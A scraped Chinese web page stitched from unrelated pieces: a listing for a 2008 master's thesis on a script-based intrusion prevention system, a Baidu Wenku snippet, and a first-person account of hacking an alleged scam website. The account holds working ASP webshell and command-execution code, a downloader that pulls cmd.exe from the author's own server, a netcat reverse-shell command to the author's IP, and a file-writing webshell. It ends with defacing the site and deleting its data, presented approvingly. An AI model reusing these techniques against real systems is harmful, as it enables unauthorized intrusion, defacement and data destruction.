基于脚本的入侵防御系统研究--《昆明理工大学》2008年硕士论文
基于脚本的入侵防御系统研究
【摘要】：入侵防御系统(Intrusion Preventation and Protection System - IPS)是一种新的网络安全技术,它融合了多种安全防护技术(防火墙、入侵检测、防病毒、漏洞扫描等)的技术优势,能够提供全面、深层次的网络边界安全防护。
目前已商品化的入侵防御系统,通常采用专用操作系统和特定硬件实现,从而限制了系统的通用性和可扩展,随着硬件计算能力加强以及入侵手段的多样化,专用的检测设备必将导致成本的增加,相对固化的检测策略无法完全检测多样化的入侵方式,必然会出现检测准确率的降低。
本文提出一种在通用计算机环境下,通过机制和策略分离,实现一个策略脚本解释器并解释执行分析脚本,脚本可对重组的报文实现对会话全程的跟踪,检测出异常的行为生成事件；同时,脚本也可对事件生成引擎生成的事件进行分析处理,当发现攻击特征,就引发相应的操作,比如告警、记录或生成新的事件、防御阻断。
基于脚本的入侵防御系统包含以下三个部分：
(1)事件生成引擎：利用动态协议探测技术,检测网卡所采集到的数据报文的协议类型,然后根据协议类型判断当前连接的状态,进而产生不同的事件供策略脚本处理。
(2)策略脚本解释器：解释执行策略脚本,脚本语言可以对抽象出来的事件做充分细致的分析,组合事件生成引擎中应用层协议分析和脚本的分析能力可以提供更加强大的入侵检测功能。无论是脚本解析还是正则匹配,都是针对一个完整会话重组过的数据来进行,实现了检测的细粒度,提高了入侵检测的精准度；
(3)阻断与联动技术：根据策略脚本解释器提供抽象出来的事件,入侵阻断模块通过脚本伪造iptables指令与内核防火墙联动或者伪造命令行与其他防御模块联动实现对入侵的及时阻断,从而阻断攻击。
在真实环境中,利用现有的通用计算机平台,千兆环境下,我们对所搭建的IPS系统进行测试,平台的CPU占用率,内存使用率,复杂入侵行为检测的准确率,以及对入侵行为的阻断率等性能指标进行了测试,其结果是令人满意的.
【关键词】：
【学位授予单位】：昆明理工大学【学位级别】：硕士【学位授予年份】：2008【分类号】：TP393.08【目录】：
摘要3-4Abstract4-6目录6-8第一章 绪论8-15 1.1 IPS的概念和特征8-9 1.2 入侵防御系统(IPS)与入侵检测系统(IDS)之间的差异9-10 1.3 入侵防御系统的分类10-14
1.3.1 根据保护对象分类10-12
1.3.2 基于检测方法分类12-14 1.4 论文的选题意义及工作论述14
1.4.1 论文的选题意义14
1.4.2 工作论述14 1.5 论文结构14-15第二章 相关技术15-30 2.1 编译原理15-19 2.2 正则表达式与有穷自动机19-23
2.2.1 正则表达式19-21
2.2.2 有穷自动机21-23 2.3 Flex与Bison简介23-26
2.3.1 Flex与Bison程序规则23-24
2.3.2 Flex与Bison程序编写步骤24-25
2.3.3 Flex和Bison之间的接口25-26 2.4 包过滤技术26-27 2.5 Expect简介27-30第三章 IPS的整体框架设计30-32 3.1 数据采集30 3.2 事件分发处理引擎30-31 3.3 策略脚本解释器31 3.4 防御阻断与联动31-32第四章 基于脚本的开放型IPS具体实现32-57 4.1 数据采集32 4.2 事件处理与分发引擎32-36
4.2.1 TCP处理33
4.2.2 UDP处理33-34
4.2.3 动态协议探测技术34-36 4.3 策略脚本36-46
4.3.1 策略脚本实现36-42
4.3.2 举例:Pop3协议策略脚本42-46 4.4 防御阻断与联动技术46-57
4.4.1 内嵌包过滤防火墙46-52
4.4.2 使用脚本语言实现检测模块和防御阻断模块之间的联动52-53
4.4.3 使用脚本语言实现与其它防御设备之间的联动53-57第五章 部署与测试57-59 5.1 IPS的部署57 5.2 性能测试57-59第六章 总结与展望59-61 6.1 总结59 6.2 系统不足与展望59-61致谢61-62主要参考文献62-64附录A(攻读学位期间发表论文目录)64
欢迎：、、)
支持CAJ、PDF文件格式
【相似文献】
中国期刊全文数据库
;[J];信息安全与通信保密;2007年05期
陶智;;[J];软件世界;2007年19期
李金库;丁常福;;[J];信息安全与通信保密;2008年02期
;[J];信息安全与通信保密;2009年11期
孙选安;;[J];信息安全与通信保密;2011年06期
;[J];信息安全与通信保密;2007年09期
孙选安;;[J];计算机安全;2011年06期
杜淑琴,谢新屋,杨文伟;[J];现代计算机;2004年10期
方红琴;;[J];计算机教育;2004年04期
李学勇,屠全良;[J];太原大学学报;2003年03期
中国重要会议论文全文数据库
彭钊;谷利泽;;[A];2010年全国通信安全学术会议论文集[C];2010年
周丰杰;;[A];全国第21届计算机技术与应用学术会议（CACIS?2010）暨全国第2届安全关键技术与应用学术会议论文集[C];2010年
刘松;赵东明;周清雷;;[A];计算机研究新进展（2010）----河南省计算机学会2010年学术年会论文集[C];2010年
朱秀玲;李剑;杨义先;;[A];2006北京地区高校研究生学术交流会----通信与信息技术会议论文集（下）[C];2006年
张洪喜;王汉才;;[A];吉林省测绘学会2008年学术年会论文集（下）[C];2008年
马传龙;张涛;熊伟;;[A];2006通信理论与技术新进展----第十一届全国青年通信学术会议论文集[C];2006年
曾克明;;[A];2009全国测绘科技信息交流会暨首届测绘博客征文颁奖论文集[C];2009年
杨天勇;;[A];2007中国科协年会----通信与信息发展高层论坛论文集[C];2007年
王勇;刘兴丽;;[A];黑龙江省气象计算机应用与通信交流会论文集[C];2006年
鄢召民;;[A];山东省石油学会油田电力、通信及自动化技术研讨会优秀工程技术论文集[C];2009年
中国重要报纸全文数据库
沈建苗 编译;[N];计算机世界;2005年
刘杨;[N];中国计算机报;2003年
付丽;[N];大众科技报;2007年
张琳;[N];网络世界;2006年
吴凡;[N];计算机世界;2007年
;[N];人民邮电;2007年
邵宪昌 山林;[N];中国城乡金融报;2007年
北京长信泰康通信技术有限公司
宫键欣;[N];人民邮电;2008年
那罡;[N];中国计算机报;2008年
CPW记者　张戈;[N];电脑商报;2004年
中国博士学位论文全文数据库
张桂玲;[D];天津大学;2006年
赵阔;[D];吉林大学;2008年
曹明;[D];北京邮电大学;2008年
查冲平;[D];华东师范大学;2012年
中国硕士学位论文全文数据库
吴玉山;[D];吉林大学;2010年
张丙凡;[D];江苏科技大学;2010年
王莎;[D];电子科技大学;2010年
林延福;[D];西安电子科技大学;2005年
聂林;[D];西安电子科技大学;2005年
康晓宁;[D];清华大学;2004年
闫贺;[D];大庆石油学院;2010年
梁波;[D];昆明理工大学;2008年
刘少英;[D];中南民族大学;2010年
胡华;[D];武汉科技大学;2010年
&快捷付款方式
&订购知网充值卡
400-819-9993
《中国学术期刊（光盘版）》电子杂志社有限公司
同方知网数字出版技术股份有限公司
地址：北京清华大学 84-48信箱 大众知识服务
出版物经营许可证 新出发京批字第直0595号
订购***：400-819-82499
服务***：010--
在线咨询：
传真：010-
京公网安备75号俄罗斯黑客的120多个脚本入侵动画+也是各大站的vi_百度文库
两大类热门资源免费畅读
续费一年阅读会员，立省24元！
评价文档：
俄罗斯黑客的120多个脚本入侵动画+也是各大站的vi
上传于||文档简介
&&黑​客​技​术
大小：4.17KB
登录百度文库，专享文档复制特权，财富值每天免费拿！
你可能喜欢您的位置： &
基于脚本的千兆位入侵防御开放模型研究
优质期刊推荐您的位置： &
Adsutil.vbs在脚本入侵中的妙用
优质期刊推荐入侵骗子站全过程（图）
作者：佚名
字体：[ ] 来源：互联网 时间：10-08 19:36:20
最近在网上老是看到有人说被一个网址为“”的黑客培训机构骗了钱，而且骗取的金额数目可不少。于是，抱着为民除 害的心态，准备对这个所谓的黑客培训机构进行一次渗透。在网上搜索了一些关于这个网站的资料，得知，这个网站在前不久已经被人黑过了，
最近在网上老是看到有人说被一个网址为“”的黑客培训机构骗了钱，而且骗取的金额数目可不少。于是，抱着为民除 害的心态，准备对这个所谓的黑客培训机构进行一次渗透。在网上搜索了一些关于这个网站的资料，得知，这个网站在前不久已经被人黑过了，如果现在还要再次入 侵的话，成功的几率可能比小，于是就叫上了几个朋友一起搞。
打开“”，发现网站的页面几乎都是静态的，如图1所示。
500)this.width=500" title="点击这里用新窗口浏览图片" />
整理好思路后，我决定先从主站入手。用阿D和明小子注入工具进行了一次注入点扫面，结果无功而返，但这是我意料之中的事。然后，我变了一下思路，花了10多分钟搜集齐了的所有目录，目录如下：
/zs/photo/xiao/
/zs/photo/da/
/zs/photo/
我分别用网站猎手和明小子注入工具的批量扫描功能对这些目录进行后台扫描，然后我又用我自己加强过的NBSI一个一个的扫，结果依然是无功而返。看来从主 站入手是几乎没可能的了，于是乎开始旁注。打开“/ip/”对xuehk进行旁注查询，发现服务器上有很多 网站，很快我就找到了一个有漏洞的网站，如但是由于服务器***了比较强的杀软，所以我只拿到了一个一句话webshell，图2所示。
500)this.width=500" title="点击这里用新窗口浏览图片" />
把 webshell丢给朋友后，我用lake2的一句话木马客户端查看了一下服务器信息，webshell所在的网站根目录为“F:\wwwroot \****\wwwroot\”，****为网站域名的前段，所以，我推测的网站根目录为“F:\wwwroot\xuehk \wwwroot\”，于是我马上尝试跳转到此目录，但是没有权限。这时我想到asp.net的木马权限可能会比asp的高一点，但是上传好lake2的 asp.net一句话木马后却发现服务器不支持asp.net。
接着查看了一下终端信息，发现端口被改为了60015。查看了一下第三方软件的信息，结果serv-u路径找不到，而且默认密码改了，服务器上没有*** PcanyWhere和Radmin，MSSQL和Mysql也没有***，仔细再找了一下，也没有发现什么可利用的第三方软件，而且服务器的权限设置得很 死，连“开始→程序”都打不开。
上传cmd.asp准备尝试执行命令，但cmd.asp也被服务器的杀毒软件给kill了，于是，自己操刀写了个执行cmd命令的asp脚本，代码如下：
On Error Resume Next
response.write oScriptlhn.exec(&cmd.exe /c& & request(&c&)).stdout.readall
response.write(&&)
response.write(&&)
response.write(&
response.write(&&)
%&成功上传到服务器后，执行cmd.asp命令失败。我想可能是管理员删除了cmd.exe，也可能是服务器的权限设置问题，用一句话木马查看服务器服务信 息发现Wscript并没有被禁止，本想用Wscript来执行命令，但是连一些能写的目录都找不到，常用的everyone目录都不能用，至此，提权陷 入了死局。感觉没什么意思，就跟朋友说了下情况出去玩了。
晚上回来的时候，朋友说找了N个小时，终于找到了一个能写的目录，目录位置是“C:\Program Files\free3web~”，这着实吓了我一跳，一个软件的目录居然能写？打开这个目录看了看，不知道是什么东西，就搁在了一边。准备把cmd上传 到服务器的时候我又发现了一个问题，就是我该如何把二进制文件传上服务器呢？一句话木马只支持文本上传。有的朋友可能说用Wget.vbs来下载，但是你 想想，我们该怎么执行命令让Wget.vbs去下载文件呢？经过一会儿的思考，我终于想到了一个办法，不能上传，但能下载吧？于是我在网上找到了一个可行 的办法，就是利用Microsoft.XMLHTTP来下载文件到服务器上。我们先把cmd.exe传上自己的网站上（为了减少体积，我用FSG压缩了 cmd.exe！），然后打开一句话木马客户端增强版，填好一句话木马的信息后，把第三个框清空，再把第二个框的代码换成：
Set xPost = CreateObject(&Microsoft.XMLHTTP&)
xPost.Open &GET&,&被下载文件的网址&,False
xPost.Send()
Set sGet = CreateObject(&ADODB.Stream&)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath(&保存的文件名&),2
set sGet = nothing
set sPOST = nothing
response.Write(&下载成功！&)再点击“GO”按钮后，一会儿文件就会被下载到服务器上了，如图3、4所示。
500)this.width=500" title="点击这里用新窗口浏览图片" />
上传好cmd.exe后，在我刚才写的cmd.asp脚本的代码中把“cmd.exe”改为“C:\Program Files\free3web~\cmd.exe”，尝试着执行了一下命令，发现执行成功！看来不需要用Wscript来执行命令了，如图5所示。
500)this.width=500" title="点击这里用新窗口浏览图片" />
用 dir命令想查看F盘的文件，但是没有权限，真是郁闷死我了，能执行命令但又没有利用价值，于是我就准备在网上查一些关于服务器提权的文章，看看别人的提 权思路。谁知我无意中看到一篇关于webshell下nc反弹的权限讨论，仔细看过讨论后得知原来用nc反弹回来的shell权限是比webshell权限高的！于是我马上弄了一个我免杀过的nc到服务器上，在本地打开cmd，输入命令“nc -vv -l -p 2006”，然后在webshell中输入“c:\Program~\freeweb\nc.exe -e c:\Program~\freeweb\cmd.exe 我的IP 2006”，一会儿nc就有回应了，我尝试执行命令“net user aa aa /add”，结果失败，证明权限不是system，但当我用命令“dir F:\wwwroot\xuehk\wwwroot\”的时候，居然成功的列出了网站的所有文件，如图6所示。
500)this.width=500" title="点击这里用新窗口浏览图片" />
然后我试着用echo命令来在写一个文件，输入
echo H4cked by 落叶纷飞&luoye.txt成功写入了的网站根目录，如图7所示。
500)this.width=500" title="点击这里用新窗口浏览图片" />
现在来echo一个一句话木马吧！输入
echo ^execute request^(&l&^)^&luoye.asp成 功写入luoye.asp，但因为服务器屏蔽了asp调试错误的信息，所以打开luoye.asp时返回的页面是500内部错误，但是这并不影响一句话木 马的使用，我用lake2的一句话木马客户端连接上的一句话木马后，用它的“Edit TextFile”功能把的首页文件index.asp替换成了黑页，并且在nc反弹回来的shell中将其数据完全删除掉了，也算是 给他们一个小小的教训吧！总的来说，这次入侵的目的还是达到了。
大家感兴趣的内容
12345678910
最近更新的内容